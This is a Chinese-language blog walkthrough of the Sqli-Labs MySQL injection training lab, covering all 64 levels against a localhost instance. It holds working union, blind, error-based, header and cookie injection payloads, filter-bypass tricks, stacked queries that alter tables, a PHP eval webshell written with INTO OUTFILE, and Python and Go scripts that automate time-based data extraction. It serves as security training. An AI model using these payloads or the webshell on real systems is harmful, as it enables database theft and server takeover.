MySql DB Sql注入

本文总阅读量
  14 mins to read  

MYSQL Sql Injection

Sqli-Labs


常用函数

version()——MySQL 版本

user()——数据库用户名

current_user——当前用户名

database()——数据库名

@@datadir——数据库路径

@@version_compile_os——操作系统版本

into outfile——写入文件,select '一句话木马' into outfile "/var/www/html/test.php"

数据库插入语句:insert into [table] values(a,b,c);

删除语句:delete from [table] where id=1;

drop database [datebase];drop table [table];alter table [table] drop column [column];

修改:update [table] set [column] = 'abc' where id =1;

concat(str1,str2,…)——无分隔符地连接字符串

concat_ws(separator,str1,str2,…)——含有分隔符地连接字符串

group_concat(group SEPARATOR ‘;’ )——连接一组字符串,后可加GROUP BY

extractvalue() 从xml中提取数据

盲注

length()

mid(str,n,m) 从str的第n个数开始提取m个 //与vb的mid()函数相同

substr(str,n,m) 从str的第n个数开始提取m个

left(str,n) 从左开始提取n个 //与vb的left()函数相同

ord() 字符=>ascii //与python的ord()函数相同

ascii() 同ord()

Time-Based

BENCHMARK(count,func())

sleep()

if(a,t,f) //同a?t:f

Wrong-Based

使用group by对rand()函数操作时会返回duplicate key error

rand(int) //以int为种子生成伪随机数

floor() //向下取整

count() //统计个数

  • and extractvalue(1, concat(0x25, (select table_name from information_schema.tables limit 1)));

  • and 1=(updatexml(1,concat(0x25,(select user())),1))

  • and(select 1 from(select count(),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#

  • and select * from(select * from table a join table b)as c

正则注入

Mysql中的RE和大多数编程语言中的相同,不赘述

select user() regexp '^[a-z]' 正确时返回1,错误返回0

select * from * where id =1 and 1=(user() regexp '^[a-z]{4}')

regexp可替换为like

操作文件

and (select count(*) from mysql.user)>0 //返回正常说明有读取权限

select * INTO OUTFILE 'file_name' //写入文件,文件不能存在

爆数据库 select schema_name from information_schema.schemata

爆某库的数据表 select table_name from information_schema.tables where table_schema=’xxxxx’

爆某表的所有列 select column_name from information_schema.columns where table_name=’xxxxx’

获取某列的内容 select xx_column from xx_table

列出所有的数据库 select group_concat(schema_name) from information_schema.schemata

列出某个库当中所有的表 select group_concat(table_name) from information_schema.tables where table_schema='xxxxx'

系统数据库——information_schema,包含所有数据库相关信息

information_schema.schemata中schema_name列,字段为所有库名

information_schema.tables中table_name列对应数据库所有表名,与table_schema列对应

information_schema.columns同理,column_name与table_schema和table_name对应


Less-1

首先Please input the ID as parameter with numeric value,param的形式查询字符串为id

id=1闭合单引号报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

添加注释使用order by查列数,此处order by为:ORDER BY column1 [ASC|DESC], column2 [ASC|DESC],...,为指定以某一列为key进行排序,通过尝试可以得出列数。这里经尝试为3列

接着进行联合注入,通过回显爆出表名,列名,字段。这里查询时需要将id查询结果限定为空集,第二个查询结果才能显示出来

爆数据库 http://localhost/sqli/less-1/?id=-1' union select 1,group_concat(schema_name),concat_ws(';',schema_name) from information_schema.schemata--+

爆当前security数据库的表 http://localhost/sqli/less-1/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

爆user表的列 http://127.0.0.1/sqli/less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

爆数据 http://127.0.0.1/sqli/less-1/?id=-1' union select 1,concat_ws(';',username,password),3 from users where id=1--+


Less-2

在查询字符串id值设为1

接着添加单引号,报错为You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

可知单引号影响了闭合,为传入整数查询

后续注入内容与Less-1相同:表-列-值


Less-3

查询id=1,加单引号,报错为syntax to use near ''1'') LIMIT 0,1' at line 1,猜测后台查询语句为select * from * where id = ('$id') LIMIT 0,1

接着只需构造payload为http://127.0.0.1/sqli/less-3/?id=-1') union select 1,database(),3--+ ,后续注入同Less-1和Less-2


Less-4

提交id=1,添加单引号页面正常,添加双引号报错为syntax to use near '"1"") LIMIT 0,1' at line 1,猜测后台查询语句为select * from * where id = ("$id") LIMIT 0,1

构造payload为http://127.0.0.1/sqli/less-3/?id=-1") union select 1,database(),3--+,后续注入同上


Less-5

提交id=1,显示u are in,知需要盲注

加单引号报错,知闭合为单引号

接下来可以构造payload进行基于bool的盲注

http://127.0.0.1/sqli/less-5/?id=1' and mid(database(),1,1)='s'--+,库名security第一位为’s’,假如猜错则会无回显

慢慢试吧,写个脚本更方便

Bool-Based http://127.0.0.1/sqli/less-5/?id=1' and mid((select group_concat(schema_name) from information_schema.schemata),1,1)>'b'--+

http://127.0.0.1/sqli/less-5/?id=1' and mid((select table_name from information_schema.tables where table_schema='security' LIMIT 0,1),1,1)>'b'--+

http://127.0.0.1/sqli/less-5/?id=1' and mid((select column_name from information_schema.columns where table_name='users' LIMIT 0,1),1,1)>'b'--+

http://127.0.0.1/sqli/less-5/?id=1' and mid((select(username) from security.users where id=1),1,1)>'b'--+

Wrong-Based http://127.0.0.1/sqli/less-5/?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x25,version(),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

http://127.0.0.1/sqli/less-5/?id=1' union select 1,count(*),concat(0x25,database(),0x25,floor(rand(0)*2))a from information_schema.tables group by a--+

http://127.0.0.1/sqli/less-5/?id=1' union select 1,count(*),concat(0x25,(select schema_name from information_schema.schemata limit 0,1),0x25,floor(rand(0)*2))a from information_schema.schemata group by a--+

http://127.0.0.1/sqli/less-5/?id=1' union select 1,count(*),concat(0x25,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x25,floor(rand(0)*2))a from information_schema.tables group by a--+

这里修改LIMIT n,1即可遍历

Time-Based http://127.0.0.1/sqli/less-5/?id=1' and if(ascii(mid(database(),1,1))=96,1,sleep(5))--+

http://127.0.0.1/sqli/less-5/?id=1' and if((ascii(mid((select schema_name from information_schema.schemata limit 0,1),1,1))=ascii('i')),1,sleep(5))--+


Less-6

上一关的单引号改为双引号闭合,其余完全相同,采用延时注入

http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select schema_name from information_schema.schemata limit 0,1),1,1))=ascii('i'),1,sleep(5))--+

http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=ascii('e'),1,sleep(5))--+

http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1))=ascii('u'),1,sleep(5))--+

http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select concat(username,0x25,password) from users where id=1 limit 0,1),1,1))=ascii('D'),1,sleep(5))--+

http://127.0.0.1/sqli/less-6/?id=1" and if(ascii(mid((select concat(username,0x25,password) from users where id=1 limit 0,1),5,1))=ascii('%'),1,sleep(5))--+


Less-7

首先判断参数提交为((‘$id’)),接着提示需要use outfile

http://127.0.0.1/sqli/less-7/?id=1 and (select count(*) from mysql.user)>0--+返回正常,说明有写入权限

查询列 http://127.0.0.1/sqli/less-7/?id=1')) union select 1,2,(username from users where id=1) into outfile "D:\\phpStudy\\WWW\\sqli\\Less-7\\qqq.php"--+

读取文件并写入 http://127.0.0.1/sqli/less-7/?id=1')) union select 1,2,load_file('D:\\phpStudy\\WWW\\phpinfo.php') into outfile "D:\\phpStudy\\WWW\\sqli\\Less-7\\aaa.txt"

写入webshell,拿菜刀连接 http://127.0.0.1/sqli/less-7/?id=1')) union select 1,2,'<?php eval($_POST["dump"]) ?>' into outfile "D:\\phpStudy\\WWW\\sqli\\Less-7\\qqq.php"--+


Less-8

提交?id=' or 1=1--+,知为单引号闭合

多说一点,我发现Mysql或者是后端php中,认为两个单引号等同于一个双引号,这里提交?id="' or 1=1--+也会返回正常

知道如何闭合后采取延时注入或布尔注入就可以了,报错注入这一关源码中设置不回显报错

http://127.0.0.1/sqli/less-8/?id=1' and ascii(mid((select password from users where id=1),1,1))=ascii('a')--+


Less-9

页面标题,延时注入,单引号闭合

不太能理解这源码闭合的问题,这里单引号双引号闭合都不会报错。但在注入时双引号返回错误

http://127.0.0.1/sqli/less-9/?id=1' and if(ascii(mid((select password from users where id=1),1,1))=ascii('a'),sleep(5),1)--+


Less-10

页面标题,延时,双引号

http://127.0.0.1/sqli/less-10/?id=1" and if(ascii(mid((select password from users where id=1),1,1))=ascii('a'),sleep(5),1)--+


Less-11

这一关为post注入,查看源代码 @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

构造万能语句 admin' or '1'='1,密码随意填写,可看到登录成功

或者admin' and 1=1#

只需要注意这里要使用#注释


Less-12

闭合为(“$user”),故构造payload为admin") or 1=1#


Less-13

闭合为(‘$user’),payload:admin') or 1=1#


Less-14

闭合为”$id”,payload:admin" or 1=1#

当然也可以进行盲注


Less-15

本关发现加单引号或双引号都没有报错回显,说明只能靠猜了

uname=admin' and mid(database(),1,8)='security'#&passwd=a&submit=Submit

uname=admin' and mid((select password from security.users where id=1),1,1)='a'#&passwd=a&submit=Submit


Less-16

页面标题提示为Time-Based

一样没有报错回显,经测试为(“$id”)闭合

构造payload:uname=admin") and if(ascii(mid((select username from security.users where id=1),1,1))=ascii('D'),sleep(5),1)#&passwd=a&submit=Submit


Less-17

进入页面提示为PASSWORD RESET,为重置密码界面,从密码框尝试注入

这里对于username表单进行了过滤:

function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

为单引号闭合

提交的sql语句为@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

这一关注入时不能对users表进行查询,不然会报You can't specify target table 'users' for update in FROM clause错误,原因是不能在同一语句中先select再update

所以这个语句会报错uname=admin&passwd=a' and if(mid((select username from users where id=1),1,1)='D',sleep(5),1)#&submit=Submit

而且我发现提交payload上去本地服务器就挂掉了,且user表中password列都被修改为0,记下这个坑。而且这里的问题会影响后面的请求头注入,US,cookie之类的无法echo到页面,需要初始化数据库

采用报错注入

uname=admin&passwd=11'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&submit=Submit


Less-18

进入页面看见显示了IP ADDR,知需要http header注入,使用BurpSuite修改请求头

使用extractvalue函数进行报错注入,针对UA进行注入,按理修改x-forwarder-for也可以注入,但这一关作者好像只希望通过UA注入

'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1


Less-19

这一关修改referer,说到referer,据说当时修订http协议的那人拼错了单词,然后就将错就错一直拼成referer….

'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1`


Less-20

看页面标题为Cookie注入

Burp修改Cookie为uname=admin'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#


Less-21

这关对payload进行了b64编码,且闭合为(‘$uname’)

uname=admin'and(select 1 from(select count(*),concat((select (select (select concat(0x25,(select username from users where id=1),0x25))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

uname=YWRtaW4nYW5kKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IChzZWxlY3QgKHNlbGVjdCBjb25jYXQoMHgyNSwoc2VsZWN0IHVzZXJuYW1lIGZyb20gdXNlcnMgd2hlcmUgaWQ9MSksMHgyNSkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj


Less-22

同Less-21,闭合改为”$uname”


Less-23

单引号闭合,过滤了注释符

通过联合查询语句闭合单引号构造payload

http://127.0.0.1/sqli/less-23/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),'3

http://127.0.0.1/sqli/less-23/?id=-1' union select 1,(select username from security.users where id=2),'3


Less-24

这一关index页面为注册账号并登录

通过查看pass_change.php的源码,登录后修改密码的sql语句为: $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

通过注册用户名为admin'#的账号,修改密码时sql语句会变成: $sql = "UPDATE users SET PASSWORD='123' where username='admin'#' and password='$curr_pass' ";

sql语句执行后,admin账户密码被修改


Less-25

可知过滤掉了or && and

http://127.0.0.1/sqli/less-25/?id=-1' union select 1,database(),3--+

如何绕过字符过滤:

  • 编码
  • &&和 
  • 内联注释/**/
  • 重复写入

其实这一关直接联合查询是不需要管转义的

http://127.0.0.1/sqli/less-25/?id=-1' union select 1,(select passwoorrd from users where id=2),3--+

因为password中的or被过滤,所以需写为passwoorrd

报错注入使用extractvalue

http://127.0.0.1/sqli/less-25/?id=1' || extractvalue(1,concat(0x25,(select passwoorrd from users where id=1)))--+


Less-25a

这一关id为加引号,同Less-25

http://127.0.0.1/sqli/less-25a/?id=-1 union select 1,(select passwoorrd from users where id=2),3--+


Less-26

这一关为过滤空格与注释,而且前一关的and && or也被注释

用以下方式绕过: |Hex|含义| |—-|——-| |%09| TAB 键(水平)| |%0a| 新建一行| |%0c| 新的一页| |%0d| return 功能| |%0b| TAB 键(垂直)| |%a0| 空格|

http://127.0.0.1/sqli/less-26/?id=1'%0aunion%0aselect%0a1,database(),'3


Less-26a

同上一关,闭合为(‘$id’)


Less-27

这一关过滤了union和select加上前一关的字符

http://127.0.0.1/sqli/less-27/?id=0'%0aununionion%0aseLect%0a1,(seLect%0apassword%0afrom%0ausers%0awhere%0aid=2),'3


Less-27a

闭合改为(“$id”)


Less-28

跟前面基本没区别,闭合为(‘$id’)


Less-28a

同上


Less-29

没看懂哪里有WAF,可能是我本地配置有问题

http://127.0.0.1/sqli/less-29/?id=0' union select 1,(select password from users where id=3),3--+

看别人的wp是需要参数污染,提交两个id,提供反向代理的服务器解析第一个id,提供web服务的服务器解析第二个,WAF过滤只处理第一个参数


Less-30

同上

http://127.0.0.1/sqli/less-30/?id=0" union select 1,user(),3--+


Less-31

http://127.0.0.1/sqli/less-31/?id=0") union select 1,(select password from users where id=3),3--+


Less-32

这一关开始是宽字节注入

所谓宽字节就是用两个以上字节表示的,如utf-8编码和GBK编码,不同与ascii的一个字节0-128。在对引号进行过滤时,会添加转义符,urlencode为%5c%27,此时添加%df,%df%5c组成unicode汉字

http://127.0.0.1/sqli/less-32/?id=0%df%27 union select 1,database(),3--+


Less-33

跟上一关一模一样

http://127.0.0.1/sqli/less-32/?id=0%df%27 union select 1,database(),3--+


Less-34

post注入,经尝试uname和passwd都存在单引号过滤。post注入中无法使用URL Encoding的方式绕过,这里使用单引号的utf-16/utf-32编码绕过

uname=� ' or 1=1#&passwd=1


Less-35

id并未被闭合,不需要考虑引号过滤

http://127.0.0.1/sqli/less-35/?id=0 union select 1,database(),3--+


Less-36

单引号闭合 http://127.0.0.1/sqli/Less-36/?id=-1%df%27 union select 1,user(),3--+


Less-37

同34关

uname=� ' or 1=1#&passwd=1


Less-38

堆叠注入stacked-injection

注入多条Sql语句,分号分割,同C语言单行多条语句

payload: http://127.0.0.1/sqli/Less-38/?id=1';insert into users(id,username,password) values('40','Ivan','Ivan')--+

还可以进行drop database,update password等操作


Less-39

同上一关,id不闭合

http://127.0.0.1/sqli/Less-38/?id=1;insert into users(id,username,password) values('40','Ivan','Ivan')--+


Less-40

(‘$id’)闭合

http://127.0.0.1/sqli/Less-38/?id=1');insert into users(id,username,password) values('40','Ivan','Ivan')--+


Less-41

同Less-39,id不闭合,无错误回显


Less-42

post注入,查看源码发现uname进行了过滤,故对passwd进行注入

passwd: a';create table ooo like users;


Less-43

同Less-42,闭合为(‘$id’)


Less-44

单引号闭合,无报错回显,同Less-42


Less-45

同Less-43,无报错回显


Less-46

order by注入

参数提交?sort=1 desc/?sort=1 asc,如果返回结果不同则可以进行注入。rand(true)与rand(false)返回结果不同,可以进行基于布尔的注入。还可以?sort=1 and [payload]进行报错注入或延时注入

报错注入payload: http://127.0.0.1/sqli/Less-46/?sort=1 and extractvalue(1,concat(0x25,(select password from users where id=3)))


Less-47

sort参数变为字符型,前闭合后注释就ok

http://127.0.0.1/sqli/Less-47/?sort=1' and extractvalue(1,concat(0x25,(select password from users where id=3)))--+


Less-48

这一关无报错回显,使用延时注入

http://127.0.0.1/sqli/Less-48/?sort=1 and if(mid(database(),1,1)='s',sleep(5),1)--+


Less-49

同Less-47,无报错回显,延时注入

http://127.0.0.1/sqli/Less-49/?sort=1' and if(mid(database(),1,1)='s',sleep(5),1)--+


Less-50

order by注入与堆叠注入

http://127.0.0.1/sqli/Less-50/?sort=1;create table aaa like users


Less-51

同上,单引号闭合

http://127.0.0.1/sqli/Less-50/?sort=1';create table aaa like users--+


Less-52

同Less-50,payload完全相同


Less-53

同Less-51,payload完全相同



Less-54

从这一关开始进行实战注入,限制十次尝试机会,且每次的表名列名字段名随机

payload依次为:

http://127.0.0.1/sqli/less-54/index.php?id=1'

http://127.0.0.1/sqli/less-54/index.php?id=1' order by 3--+

http://127.0.0.1/sqli/less-54/index.php?id=1' order by 4--+

http://127.0.0.1/sqli/less-54/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+

爆出表名为p08ie9rpnc

http://127.0.0.1/sqli/less-54/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='p08ie9rpnc'--+

爆出列名为id,sessid,secret_1A88,tryy

http://127.0.0.1/sqli/less-54/index.php?id=-1' union select 1,group_concat(secret_1A88),3 from p08ie9rpnc--+

爆出secret key并提交YsQHctIhjx2pxHXeva7di5dj

英语不好是真惨,看不懂上面的字还以为红色是注入失败了…


Less-55

闭合为($id),猜闭合就会花很多次

http://127.0.0.1/sqli/less-55/?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+

http://127.0.0.1/sqli/less-55/?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='zyx0hgi9h3'--+

http://127.0.0.1/sqli/less-55/?id=0) union select 1,group_concat(secret_72LK),3 from zyx0hgi9h3--+


Less-56

闭合为(‘$id’)

http://127.0.0.1/sqli/less-56/?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+

http://127.0.0.1/sqli/less-56/?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='go1rv0brdo'--+

http://127.0.0.1/sqli/less-56/?id=0') union select 1,group_concat(secret_LJOZ),3 from go1rv0brdo--+


Less-57

双引号闭合

http://127.0.0.1/sqli/less-57/?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='CHALLENGES'--+

http://127.0.0.1/sqli/less-57/?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='hxf6ijm27v'--+

http://127.0.0.1/sqli/less-57/?id=0" union select 1,group_concat(secret_T011),3 from hxf6ijm27v--+


Less-58

联合查询无回显,且限制次数只有五次,需要报错注入

http://127.0.0.1/sqli/less-58/?id=1' and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES'),0x25))--+

http://127.0.0.1/sqli/less-58/?id=1' and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='pg5r7v7b4r' limit 2,1),0x25))--+

http://127.0.0.1/sqli/less-58/?id=1' and extractvalue(1,concat(0x25,(select secret_LQOC from pg5r7v7b4r),0x25))--+


Less-59

id无闭合,同上一关

http://127.0.0.1/sqli/less-59/?id=1 and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES')))--+

http://127.0.0.1/sqli/less-59/?id=1 and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='sd9a8g0soe' limit 2,1),0x25))--+

http://127.0.0.1/sqli/less-59/?id=1 and extractvalue(1,concat(0x25,(select secret_DVPW from sd9a8g0soe),0x25))--+


Less-60

(“$id”)闭合

http://127.0.0.1/sqli/less-60/?id=1") and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES'),0x25))--+

http://127.0.0.1/sqli/less-60/?id=1") and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='xo7c1hm38d' limit 2,1),0x25))--+

http://127.0.0.1/sqli/less-60/?id=1 and extractvalue(1,concat(0x25,(select secret_YJII from xo7c1hm38d),0x25))--+


Less-61

闭合为((‘$id’))

http://127.0.0.1/sqli/less-61/?id=1')) and extractvalue(1,concat(0x25,(select table_name from information_schema.tables where table_schema='CHALLENGES'),0x25))--+

http://127.0.0.1/sqli/less-61/?id=1')) and extractvalue(1,concat(0x25,(select column_name from information_schema.columns where table_name='gfmtwwxgwf'),0x25))

http://127.0.0.1/sqli/less-61/?id=1')) and extractvalue(1,concat(0x25,(select secret_4KX6 from gfmtwwxgwf),0x25))--+


Less-62

看到这个次数我是绝望的

进行延时注入:

脚本:

import requests,string

payload = string.lowercase+string.digits
lenth = 0
result = ''

for i in range(1,15):
    try:
        url = "http://127.0.0.1/sqli/less-62/?id=1') and if(length((select table_name from information_schema.tables where table_schema='CHALLENGES'))='"+str(i)+"',sleep(5),1)--+"
        r = requests.get(url, timeout=5)
    except:
        lenth = i
        break
    
for i in range(1, lenth+1):
    for j in payload:
        try:
            url = "http://127.0.0.1/sqli/less-62/?id=1') and if(mid((select table_name from information_schema.tables where table_schema='CHALLENGES'),"+str(i)+",1)='"+str(j)+"',sleep(5),1)--+"
            r = requests.get(url,timeout=5)
        except:
            result += str(j)
            break
    print result

Golang时间盲注:

利用goroutine来快速注入

package main

import (
	"fmt"
	"time"

	"github.com/eddieivan01/nic"
)

var flag = [32]byte{}

func display() {
	for {
		time.Sleep(time.Duration(1) * time.Second)
		fmt.Println(string(flag[:]))
	}
}

func main() {
	payload := `select flag from flag`
	var url string
	for i := 1; i < 30; i++ {
		go func(i int) {
			for _, j := range []byte("{}qwertyuioplkjhgfdsazxcvbnm098764321_") {
				url = fmt.Sprintf("http://127.0.0.1/sqli/Less-1/?id=1' and if(mid((%s),%d,1)='%v',sleep(3),0)-- -", payload, i, string(j))
				_, err := nic.Get(url, &nic.H{
					Timeout: 3,
				})
				if err != nil {
					flag[i-1] = byte(j)
					return
				}
			}
		}(i)
	}
	display()
}

λ go run time-based.go


    {
    {
    {                       }
    { q                     }
    { q                     }
    { q     e           e  e}
    { q     e           e  e}
    { q     e t         e  e}
    { q     e t         e  e}
    { q     e t         e  e}
    { q  i  e ti        e  e}
    { q  i  e tio       e  e}
    { q  i  e tio       e  e}
 l  { ql i  e tio     lle  e}
 l  { ql i  e tio     lle  e}
 l  { ql i je tio     lle  e}
 l  { ql i je tio   h lle  e}
 l g{ ql i je tio   h lle ge}
fl g{ ql i je tio   h lle ge}
fl g{ ql i je tio   h lle ge}
fl g{sql i je tio   h lle ge}
flag{sql i je tio   halle ge}
flag{sql i je tio   halle ge}
flag{sql i je tio   halle ge}
flag{sql i jectio  challe ge}
flag{sql i jectio  challe ge}
flag{sql i jectio  challe ge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql injection challenge}
flag{sql_injection_challenge}
flag{sql_injection_challenge}

Less-63

单引号闭合,同上关脚本


Less-64

(“$id”)闭合,同上上关脚本


前前后后花了大概半个月刷完了sqli-labs,对于Mysql数据库的注入算初窥门径,对于MSSql,Oracle或是MongoDB等nosql型数据库还需学习积累经验。继续学习吧!

end